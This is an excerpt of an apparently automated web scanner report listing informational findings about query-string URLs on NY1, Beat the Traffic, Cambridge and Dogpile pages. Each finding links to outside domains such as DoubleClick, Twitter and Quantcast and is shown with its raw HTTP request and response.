<div class="top"><img src="http://media.corporate-ir.net/media_files/irol/11/119056/infospace_red_tplft_crnr.gif" width="10" height="10" alt="" title="" /></div><div class="middle"><img src="http://media.corporate-ir.net/media_files/irol/11/119056/clearpixel.gif" width="1" height="39" alt="" title="" /></div><div class="bottom"><img src="http://media.corporate-ir.net/media_files/irol/11/119056/infospace_red_btlft_crnr.gif" width="10" height="10" alt="" title="" /></div>
...[SNIP]...
<div class="top"><img src="http://media.corporate-ir.net/media_files/irol/11/119056/infospace_red_tprght_crnr.gif" width="10" height="10" alt="" title="" /></div><div class="middle"><img src="http://media.corporate-ir.net/media_files/irol/11/119056/clearpixel.gif" width="1" height="39" alt="" title="" /></div><div class="bottom"><img src="http://media.corporate-ir.net/media_files/irol/11/119056/infospace_red_botrght_crnr.gif" width="10" height="10" alt="" title="" /></div>
...[SNIP]...

11.13. http://manhattan.ny1.com/Content/ServeContent.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://manhattan.ny1.com
Path:	/Content/ServeContent.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://manhattan.ny1.com/Content/ServeContent.aspx?id=707&ticks=666589

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/twc.ny1/topstories-manhattan;pos=bottom;twc=ad;tile=4;sz=300x250;ord=123456789?
http://ad.doubleclick.net/jump/twc.ny1/topstories-manhattan;pos=bottom;twc=ad;tile=4;sz=300x250;ord=123456789?

Request

GET /Content/ServeContent.aspx?id=707&ticks=666589 HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Referer: http://manhattan.ny1.com/content/top_stories/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=tsgnewsglobal1%2Ctsgny1%3D%2526pid%253D/favicon.ico%2526pidt%253D1%2526oid%253Dhttp%25253A//manhattan.ny1.com/content/top_stories/%2526ot%253DA; __utmz=154287268.1301681489.1.1.utmcsr=ny1.com|utmccn=(referral)|utmcmd=referral|utmcct=/favicon.ico; __utma=154287268.1094085944.1301681489.1301681489.1301681489.1; __utmc=154287268; __utmb=154287268.1.10.1301681489

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Length: 1095
Cache-Control: no-cache, no-store, must-revalidate
Expires: Fri, 01 Apr 2011 18:10:54 GMT
Date: Fri, 01 Apr 2011 18:10:54 GMT
Connection: close

<div id="8fb55670-33cc-455b-a259-ef0256301b61">

<script language="JavaScript" type="text/javascript">
if (typeof ord=='undefined') {ord=Math
...[SNIP]...
<noscript>
<a href="http://ad.doubleclick.net/jump/twc.ny1/topstories-manhattan;pos=bottom;twc=ad;tile=4;sz=300x250;ord=123456789?" target="_blank">
<img src="http://ad.doubleclick.net/ad/twc.ny1/topstories-manhattan;pos=bottom;twc=ad;tile=4;sz=300x250;ord=123456789?" width="300" height="250" border="0" alt="">
</a>
...[SNIP]...

11.14. http://manhattan.ny1.com/Content/ServeContent.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://manhattan.ny1.com
Path:	/Content/ServeContent.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://manhattan.ny1.com/Content/ServeContent.aspx?id=706&ticks=150382

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/twc.ny1/topstories-manhattan;pos=top;twc=ad;tile=4;sz=160x600;ord=123456789?
http://ad.doubleclick.net/jump/twc.ny1/topstories-manhattan;pos=top;twc=ad;tile=4;sz=160x600;ord=123456789?

Request

GET /Content/ServeContent.aspx?id=706&ticks=150382 HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Referer: http://manhattan.ny1.com/content/top_stories/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=tsgnewsglobal1%2Ctsgny1%3D%2526pid%253D/favicon.ico%2526pidt%253D1%2526oid%253Dhttp%25253A//manhattan.ny1.com/content/top_stories/%2526ot%253DA; __utmz=154287268.1301681489.1.1.utmcsr=ny1.com|utmccn=(referral)|utmcmd=referral|utmcct=/favicon.ico; __utma=154287268.1094085944.1301681489.1301681489.1301681489.1; __utmc=154287268; __utmb=154287268.1.10.1301681489

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Length: 1083
Cache-Control: no-cache, no-store, must-revalidate
Expires: Fri, 01 Apr 2011 18:11:04 GMT
Date: Fri, 01 Apr 2011 18:11:04 GMT
Connection: close

<div id="dadfd534-ef39-4650-a589-0499c9a5f502">

<script language="JavaScript" type="text/javascript">
if (typeof ord=='undefined') {ord=Math.ra
...[SNIP]...
<noscript>
<a href="http://ad.doubleclick.net/jump/twc.ny1/topstories-manhattan;pos=top;twc=ad;tile=4;sz=160x600;ord=123456789?" target="_blank">
<img src="http://ad.doubleclick.net/ad/twc.ny1/topstories-manhattan;pos=top;twc=ad;tile=4;sz=160x600;ord=123456789?" width="160" height="600" border="0" alt="">
</a>
...[SNIP]...

11.15. http://manhattan.ny1.com/Content/ServeContent.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://manhattan.ny1.com
Path:	/Content/ServeContent.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://manhattan.ny1.com/Content/ServeContent.aspx?id=708&ticks=907851

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/twc.ny1/topstories-manhattan;pos=top;twc=ad;tile=4;sz=300x250;ord=123456789?
http://ad.doubleclick.net/jump/twc.ny1/topstories-manhattan;pos=top;twc=ad;tile=4;sz=300x250;ord=123456789?

Request

GET /Content/ServeContent.aspx?id=708&ticks=907851 HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Referer: http://manhattan.ny1.com/content/top_stories/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=tsgnewsglobal1%2Ctsgny1%3D%2526pid%253D/favicon.ico%2526pidt%253D1%2526oid%253Dhttp%25253A//manhattan.ny1.com/content/top_stories/%2526ot%253DA; __utmz=154287268.1301681489.1.1.utmcsr=ny1.com|utmccn=(referral)|utmcmd=referral|utmcct=/favicon.ico; __utma=154287268.1094085944.1301681489.1301681489.1301681489.1; __utmc=154287268; __utmb=154287268.1.10.1301681489

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Length: 1083
Cache-Control: no-cache, no-store, must-revalidate
Expires: Fri, 01 Apr 2011 18:10:56 GMT
Date: Fri, 01 Apr 2011 18:10:56 GMT
Connection: close

<div id="3eea258a-5c77-4ac0-a249-c1c6cad15c8f">

<script language="JavaScript" type="text/javascript">
if (typeof ord=='undefined') {ord=Math.ra
...[SNIP]...
<noscript>
<a href="http://ad.doubleclick.net/jump/twc.ny1/topstories-manhattan;pos=top;twc=ad;tile=4;sz=300x250;ord=123456789?" target="_blank">
<img src="http://ad.doubleclick.net/ad/twc.ny1/topstories-manhattan;pos=top;twc=ad;tile=4;sz=300x250;ord=123456789?" width="300" height="250" border="0" alt="">
</a>
...[SNIP]...

11.16. http://manhattan.ny1.com/Content/ServeContent.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://manhattan.ny1.com
Path:	/Content/ServeContent.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://manhattan.ny1.com/Content/ServeContent.aspx?iframe=1&id=904

The response contains the following link to another domain:

http://www.beatthetraffic.com/widgets/traveltimes.aspx?regionid=15&customerid=6453&partner=TWC_NewYork&inrix=1&items=3&link=&code=0&ts=4&rc=false

Request

GET /Content/ServeContent.aspx?iframe=1&id=904 HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Referer: http://manhattan.ny1.com/content/top_stories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=tsgnewsglobal1%2Ctsgny1%3D%2526pid%253D/favicon.ico%2526pidt%253D1%2526oid%253Dhttp%25253A//manhattan.ny1.com/content/top_stories/%2526ot%253DA; __utmz=154287268.1301681489.1.1.utmcsr=ny1.com|utmccn=(referral)|utmcmd=referral|utmcct=/favicon.ico; __utma=154287268.1094085944.1301681489.1301681489.1301681489.1; __utmc=154287268; __utmb=154287268.1.10.1301681489

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Length: 874
Cache-Control: no-cache, no-store, must-revalidate
Expires: Fri, 01 Apr 2011 18:11:03 GMT
Date: Fri, 01 Apr 2011 18:11:03 GMT
Connection: close

<div id="ecb7d6bc-9eef-4ea4-827f-76ada2138abb"><style type="text/css">@import "/App_Skins/Global/Styles/iframeContent.css";</style><div style="position:relative; z-index:2; width:300px; height:108px;"
...[SNIP]...
<div id='outerdiv'>
<iframe src="http://www.beatthetraffic.com/widgets/traveltimes.aspx?regionid=15&customerid=6453&partner=TWC_NewYork&inrix=1&items=3&link=&code=0&ts=4&rc=false" id='inneriframe' scrolling=no></iframe>
...[SNIP]...

11.17. http://manhattan.ny1.com/Content/ServeContent.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://manhattan.ny1.com
Path:	/Content/ServeContent.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://manhattan.ny1.com/Content/ServeContent.aspx?iframe=1&id=567

The response contains the following links to other domains:

http://twitter.com/NY1OneOn1
http://twitter.com/NY1arts
http://twitter.com/NY1headlines
http://twitter.com/NY1onstage
http://twitter.com/NY1thecall
http://twitter.com/NY1weather
http://twitter.com/SportsOn1

Request

GET /Content/ServeContent.aspx?iframe=1&id=567 HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Referer: http://manhattan.ny1.com/content/top_stories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=tsgnewsglobal1%2Ctsgny1%3D%2526pid%253D/favicon.ico%2526pidt%253D1%2526oid%253Dhttp%25253A//manhattan.ny1.com/content/top_stories/%2526ot%253DA; __utmz=154287268.1301681489.1.1.utmcsr=ny1.com|utmccn=(referral)|utmcmd=referral|utmcct=/favicon.ico; __utma=154287268.1094085944.1301681489.1301681489.1301681489.1; __utmc=154287268; __utmb=154287268.1.10.1301681489

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Length: 957
Cache-Control: no-cache, no-store, must-revalidate
Expires: Fri, 01 Apr 2011 18:11:03 GMT
Date: Fri, 01 Apr 2011 18:11:03 GMT
Connection: close

<div id="30511003-f68d-4562-bacd-d270109ce44c"><style type="text/css">@import "/App_Skins/Global/Styles/iframeContent.css";</style><div style="width:300px; background-color:#B7E0F6; layer-background-c
...[SNIP]...
<b>FOLLOW US:  
<a href='http://twitter.com/NY1headlines' target='_blank'>
NY1headlines</a>
| <a href='http://twitter.com/NY1weather' target='_blank'>
NY1weather</a>
| <a href='http://twitter.com/NY1thecall' target='_blank'>
NY1thecall</a>
| <a href='http://twitter.com/NY1arts' target='_blank'>
NY1arts</a>
| <a href='http://twitter.com/NY1onstage' target='_blank'>
NY1onstage</a>
| <a href='http://twitter.com/NY1OneOn1' target='_blank'>
NY1OneOn1</a>
| <a href='http://twitter.com/SportsOn1' target='_blank'>
SportsOn1</a>
...[SNIP]...

11.18. http://manhattan.ny1.com/Content/ServeContent.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://manhattan.ny1.com
Path:	/Content/ServeContent.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://manhattan.ny1.com/Content/ServeContent.aspx?id=709&ticks=813226

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/twc.ny1/topstories-manhattan;pos=top;twc=ad;tile=4;sz=728x90;ord=123456789?
http://ad.doubleclick.net/jump/twc.ny1/topstories-manhattan;pos=top;twc=ad;tile=4;sz=728x90;ord=123456789?

Request

GET /Content/ServeContent.aspx?id=709&ticks=813226 HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Referer: http://manhattan.ny1.com/content/top_stories/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=tsgnewsglobal1%2Ctsgny1%3D%2526pid%253D/favicon.ico%2526pidt%253D1%2526oid%253Dhttp%25253A//manhattan.ny1.com/content/top_stories/%2526ot%253DA; __utmz=154287268.1301681489.1.1.utmcsr=ny1.com|utmccn=(referral)|utmcmd=referral|utmcct=/favicon.ico; __utma=154287268.1094085944.1301681489.1301681489.1301681489.1; __utmc=154287268; __utmb=154287268.1.10.1301681489

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Length: 1078
Cache-Control: no-cache, no-store, must-revalidate
Expires: Fri, 01 Apr 2011 18:10:52 GMT
Date: Fri, 01 Apr 2011 18:10:52 GMT
Connection: close

<div id="ab981f57-e692-40e0-9bb4-8fa1f7e4608e">

<script language="JavaScript" type="text/javascript">
if (typeof ord=='undefined') {ord=Math.ran
...[SNIP]...
<noscript>
<a href="http://ad.doubleclick.net/jump/twc.ny1/topstories-manhattan;pos=top;twc=ad;tile=4;sz=728x90;ord=123456789?" target="_blank">
<img src="http://ad.doubleclick.net/ad/twc.ny1/topstories-manhattan;pos=top;twc=ad;tile=4;sz=728x90;ord=123456789?" width="728" height="90" border="0" alt="">
</a>
...[SNIP]...

11.19. http://manhattan.ny1.com/Content/ServeContent.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://manhattan.ny1.com
Path:	/Content/ServeContent.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://manhattan.ny1.com/Content/ServeContent.aspx?iframe=1&id=689

The response contains the following links to other domains:

http://twitter.com/NYCASP
http://twitter.com/javascripts/blogger.js
http://twitter.com/statuses/user_timeline/NYCASP.json?callback=twitterCallback2&count=1

Request

GET /Content/ServeContent.aspx?iframe=1&id=689 HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Referer: http://manhattan.ny1.com/content/top_stories/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=tsgnewsglobal1%2Ctsgny1%3D%2526pid%253D/favicon.ico%2526pidt%253D1%2526oid%253Dhttp%25253A//manhattan.ny1.com/content/top_stories/%2526ot%253DA; __utmz=154287268.1301681489.1.1.utmcsr=ny1.com|utmccn=(referral)|utmcmd=referral|utmcct=/favicon.ico; __utma=154287268.1094085944.1301681489.1301681489.1301681489.1; __utmc=154287268; __utmb=154287268.1.10.1301681489

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Length: 670
Cache-Control: no-cache, no-store, must-revalidate
Expires: Fri, 01 Apr 2011 18:10:56 GMT
Date: Fri, 01 Apr 2011 18:10:56 GMT
Connection: close

<div id="e16b7a6e-194a-4d94-acfc-dc7363e8d121"><style type="text/css">@import "/App_Skins/Global/Styles/iframeContent.css";</style><div id="twitter_div">
<center><h2 class="sidebar-title"><a href='http://twitter.com/NYCASP' target='_blank'>NYC ALTERNATE SIDE PARKING INFO</a>
...[SNIP]...
</ul>
<a href="http://twitter.com/NYCASP" id="twitter-link" style="display:block;text-align:right;"></a>
</div>
<script type="text/javascript" src="http://twitter.com/javascripts/blogger.js"></script>
<script type="text/javascript" src="http://twitter.com/statuses/user_timeline/NYCASP.json?callback=twitterCallback2&count=1"></script>
...[SNIP]...

11.20. http://manhattan.ny1.com/Content/ServeContent.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://manhattan.ny1.com
Path:	/Content/ServeContent.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://manhattan.ny1.com/Content/ServeContent.aspx?id=705&ticks=599771

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/twc.ny1/topstories-manhattan;pos=bottom;twc=ad;tile=4;sz=160x600;ord=123456789?
http://ad.doubleclick.net/jump/twc.ny1/topstories-manhattan;pos=bottom;twc=ad;tile=4;sz=160x600;ord=123456789?

Request

GET /Content/ServeContent.aspx?id=705&ticks=599771 HTTP/1.1
Host: manhattan.ny1.com
Proxy-Connection: keep-alive
Referer: http://manhattan.ny1.com/content/top_stories/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=tsgnewsglobal1%2Ctsgny1%3D%2526pid%253D/favicon.ico%2526pidt%253D1%2526oid%253Dhttp%25253A//manhattan.ny1.com/content/top_stories/%2526ot%253DA; __utmz=154287268.1301681489.1.1.utmcsr=ny1.com|utmccn=(referral)|utmcmd=referral|utmcct=/favicon.ico; __utma=154287268.1094085944.1301681489.1301681489.1301681489.1; __utmc=154287268; __utmb=154287268.1.10.1301681489

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Length: 1095
Cache-Control: no-cache, no-store, must-revalidate
Expires: Fri, 01 Apr 2011 18:11:06 GMT
Date: Fri, 01 Apr 2011 18:11:06 GMT
Connection: close

<div id="fdb1a0f8-065c-40ca-ba90-802de646285c">

<script language="JavaScript" type="text/javascript">
if (typeof ord=='undefined') {ord=Math
...[SNIP]...
<noscript>
<a href="http://ad.doubleclick.net/jump/twc.ny1/topstories-manhattan;pos=bottom;twc=ad;tile=4;sz=160x600;ord=123456789?" target="_blank">
<img src="http://ad.doubleclick.net/ad/twc.ny1/topstories-manhattan;pos=bottom;twc=ad;tile=4;sz=160x600;ord=123456789?" width="160" height="600" border="0" alt="">
</a>
...[SNIP]...

11.21. http://www.beatthetraffic.com/widgets/traveltimes.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.beatthetraffic.com
Path:	/widgets/traveltimes.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.beatthetraffic.com/widgets/traveltimes.aspx?regionid=15&customerid=6453&partner=TWC_NewYork&inrix=1&items=3&link=&code=0&ts=4&rc=false

The response contains the following links to other domains:

http://edge.quantserve.com/quant.js
http://pixel.quantserve.com/pixel/p-d7VfOy4jYB9T6.gif
http://www.google.com/jsapi
http://www.quantcast.com/p-d7VfOy4jYB9T6

Request

GET /widgets/traveltimes.aspx?regionid=15&customerid=6453&partner=TWC_NewYork&inrix=1&items=3&link=&code=0&ts=4&rc=false HTTP/1.1
Host: www.beatthetraffic.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/Content/ServeContent.aspx?iframe=1&id=904
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 9524
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
p3p: CP="CAO CONi ONL OUR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Fri, 01 Apr 2011 18:10:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
   <HEAD>
       <title>Beat the Traffic - Drive Times</title>
       <LINK
...[SNIP]...
</LINK>
       <script src="http://www.google.com/jsapi"></script>
...[SNIP]...


<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<noscript>
<a href="http://www.quantcast.com/p-d7VfOy4jYB9T6" target="_blank">
<img src="http://pixel.quantserve.com/pixel/p-d7VfOy4jYB9T6.gif" style="display: none;"
border="0" height="1" width="1" alt="Quantcast" /></a>
...[SNIP]...

11.22. http://www.cambridge.org/uk/404_error.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cambridge.org
Path:	/uk/404_error.asp

Issue detail

The page was loaded from a URL containing a query string:

http://www.cambridge.org/uk/404_error.asp?error=catalogueimagesecomm_logo.gif

The response contains the following link to another domain:

http://www.cambridgeprinting.org/

Request

GET /uk/404_error.asp?error=catalogueimagesecomm_logo.gif HTTP/1.1
Host: www.cambridge.org
Proxy-Connection: keep-alive
Referer: http://www.cambridge.org/uk/catalogue/viewBasket.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCABRQQS=ECKFFCADIDOJDOHAENPDKHMK; __utmz=98387725.1301681613.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDAABDSSSR=JCLAEEPCFAJCKDHADOOAEPAJ; X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; ASPSESSIONIDAACDTTTQ=ELNJAEADLFOCGBEJNEMMJJLI; __utma=98387725.1017428542.1301681613.1301681613.1301681613.1; __utmc=98387725; __utmb=98387725.4.10.1301681613

Response

11.23. http://www.dogpile.com/clickserver/_iceUrlFlag=1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/clickserver/_iceUrlFlag=1

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/clickserver/_iceUrlFlag=1?rawURL=http%3A%2F%2Fwww.dailydealfetcher.com&0=&1=0&4=173.193.214.243&5=173.193.214.243&9=62fda6b6aa3440d49bc7c16a3af0cb01&10=1&11=info.dogpl.other&13=search&14=295&15=internal-nav&40=dXWTs3St9FfdeGdDtrJdnw%3D%3D&_IceUrl=true

The response contains the following link to another domain:

http://www.dailydealfetcher.com/

Request

Response

11.24. http://www.dogpile.com/clickserver/_iceUrlFlag=1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/clickserver/_iceUrlFlag=1

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/clickserver/_iceUrlFlag=1?rawURL=http%3A%2F%2Fmlb.mlb.com%2Fmlb%2Fschedule%2F&0=&1=0&4=173.193.214.243&5=173.193.214.243&9=86d1546926784d5188d2c16a3af0cb01&10=1&11=info.dogpl.rss&13=search&14=239137&15=main-title&17=1&18=1&19=0&20=0&21=1&22=RwsjzvjlQ2A%3D&23=0&40=iUN9dUgK1KXHcnq%2BNSCwpw%3D%3D&_IceUrl=true

The response contains the following link to another domain:

http://mlb.mlb.com/mlb/schedule/

Request

GET /clickserver/_iceUrlFlag=1?rawURL=http%3A%2F%2Fmlb.mlb.com%2Fmlb%2Fschedule%2F&0=&1=0&4=173.193.214.243&5=173.193.214.243&9=86d1546926784d5188d2c16a3af0cb01&10=1&11=info.dogpl.rss&13=search&14=239137&15=main-title&17=1&18=1&19=0&20=0&21=1&22=RwsjzvjlQ2A%3D&23=0&40=iUN9dUgK1KXHcnq%2BNSCwpw%3D%3D&_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: http://mlb.mlb.com/mlb/schedule/
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: DomainSession=TransactionId=93618d10e4ac4e349df4c16a3af0cb01&SessionId=9f70fd7ba5d44939a525c16a3af0cb01&PrevActionId=09595e0bb31848b5a194c16a3af0cb01&ActionId=0bca44db8e72477aac9fc16a3af0cb01&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Fri, 01-Apr-2011 17:18:52 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=9586353d328349b18887c16a3af0cb01&LastSeenDateTime=4/1/2011 4:58:52 PM&IssueDateTime=4/1/2011 4:55:38 PM&CookieDomain=.dogpile.com; domain=.dogpile.com; expires=Sun, 08-Mar-2111 16:58:52 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:58:52 GMT
Connection: close
Content-Length: 1219
Vary: Accept-Encoding, User-Agent

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://mlb.mlb.com/mlb/schedule/">here</a>.</h2>
</body></html>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Tr
...[SNIP]...
<p>
The link you clicked on is sending you to the following URL. Please click if you wish to proceed:
<a id="icePage_RedirectLink" href="http://mlb.mlb.com/mlb/schedule/">http://mlb.mlb.com/mlb/schedule/</a>
...[SNIP]...

11.25. http://www.dogpile.com/clickserver/_iceUrlFlag=1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogpile.com
Path:	/clickserver/_iceUrlFlag=1

Issue detail

The page was loaded from a URL containing a query string:

http://www.dogpile.com/clickserver/_iceUrlFlag=1?rawURL=http%3A%2F%2Fttl30d.images.infospace.com.edgesuite.net%2Fsearch%2Fimages%2Fxml%2Fprovider.xml&0=&1=0&4=173.193.214.243&5=173.193.214.243&9=7d43bcdc3ae442d4896bc16a3af0cb01&10=1&11=info.dogpl&13=Preferred%20Search&14=1200&15=other&40=tlXGgyMYyPUK9IJImZy2Zg%3D%3D&_IceUrl=true

The response contains the following link to another domain:

http://ttl30d.images.infospace.com.edgesuite.net/search/images/xml/provider.xml

Request

GET /clickserver/_iceUrlFlag=1?rawURL=http%3A%2F%2Fttl30d.images.infospace.com.edgesuite.net%2Fsearch%2Fimages%2Fxml%2Fprovider.xml&0=&1=0&4=173.193.214.243&5=173.193.214.243&9=7d43bcdc3ae442d4896bc16a3af0cb01&10=1&11=info.dogpl&13=Preferred%20Search&14=1200&15=other&40=tlXGgyMYyPUK9IJImZy2Zg%3D%3D&_IceUrl=true HTTP/1.1
Host: www.dogpile.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
